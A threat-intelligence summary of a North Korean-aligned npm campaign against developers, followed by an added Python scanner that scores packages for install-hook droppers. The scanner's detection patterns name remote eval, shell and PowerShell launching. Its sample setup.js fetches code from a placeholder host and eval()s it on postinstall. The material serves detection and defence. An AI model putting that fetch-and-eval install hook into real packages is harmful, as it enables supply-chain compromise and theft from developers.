North Korea Still Attacking Developers via npm
Essential information
- Published: 30/09/2024 10:02
- Modified: 30/09/2024 10:18
- Tags: 2024-09-30, contagious interview, cryptocurrency, exfiltration, javascript, malware, moonstone sleet, multi-stage attack, npm, obfuscation, persistence, python
- Related entities: 12 observables, 1 intrusion set (apt), 11 techniques (mitre), 2 malware, 1 other
Description
Recent weeks have seen a resurgence of North Korean-aligned groups targeting developers through npm packages. The campaign, which began on August 12, 2024, involves multiple groups using various publication patterns and attack types. The malicious packages contain obfuscated JavaScript that downloads additional components, including Python scripts and interpreters, to exfiltrate sensitive data from cryptocurrency wallets and establish persistence. Some packages use different approaches, such as directly evaluating JavaScript from remote endpoints or executing batch and PowerShell scripts to deploy and conceal malware. This coordinated effort exploits the trust in the npm ecosystem to compromise developers, infiltrate companies, and steal cryptocurrency or other valuable assets.
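As an added defender-side illustration (not part of the report above), the following Python triage helper scores an unpacked npm package for the dropper shape the description outlines: an install-time lifecycle hook paired with remote-eval, shell or PowerShell launching, Python payload fetching, or large encoded blobs. The manifest and source files below are constructed samples, and the pattern list is an assumption about what such droppers look like, not indicators from the report.

```python
import json
import re

# Hooks npm runs automatically during "npm install"; a dropper is normally wired in here.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (assumed, not from the report) for the behaviours described above.
PATTERNS = {
    "remote_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
    "network_fetch": re.compile(r"\b(https?\.(get|request)|fetch|axios)\s*\(", re.I),
    "shell_exec": re.compile(r"child_process|\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(", re.I),
    "powershell_or_batch": re.compile(r"powershell|cmd(\.exe)?\s*/c|\.bat\b|\.cmd\b", re.I),
    "python_dropper": re.compile(r"\bpython3?(\.exe)?\b|\.py\b|\bpip\b", re.I),
    "encoded_blob": re.compile(r"(\\x[0-9a-f]{2}){8,}|[A-Za-z0-9+/]{120,}={0,2}", re.I),
}
# Any of these alongside an install hook is the multi-stage shape worth a manual look.
DROPPER_HITS = {"remote_eval", "shell_exec", "powershell_or_batch", "python_dropper"}


def scan_package(package_json: str, sources: dict) -> dict:
    """Score a package from its package.json text and a {path: source} mapping."""
    manifest = json.loads(package_json)
    hooks = [(h, c) for h, c in manifest.get("scripts", {}).items() if h in INSTALL_HOOKS]
    file_flags = {}
    for path, src in sources.items():
        hits = sorted(name for name, rx in PATTERNS.items() if rx.search(src))
        if hits:
            file_flags[path] = hits
    all_hits = {h for hits in file_flags.values() for h in hits}
    score = 2 * len(hooks) + len(all_hits)  # hooks weigh more: they run unattended
    verdict = "review" if hooks and all_hits & DROPPER_HITS else "low"
    return {"install_hooks": hooks, "file_flags": file_flags, "score": score, "verdict": verdict}


# Constructed sample: a postinstall hook that fetches remote JavaScript and eval()s it.
SAMPLE_MANIFEST = '{"name":"example-pkg","version":"1.0.0",' \
                  '"scripts":{"postinstall":"node setup.js","test":"jest"}}'
SAMPLE_SOURCES = {
    "setup.js": 'const https=require("https");https.get("https://example.invalid/p",'
                'r=>{let d="";r.on("data",c=>d+=c);r.on("end",()=>eval(d));});',
    "index.js": "module.exports = function add(a, b) { return a + b; };",
}

if __name__ == "__main__":
    print(json.dumps(scan_package(SAMPLE_MANIFEST, SAMPLE_SOURCES), indent=2))
```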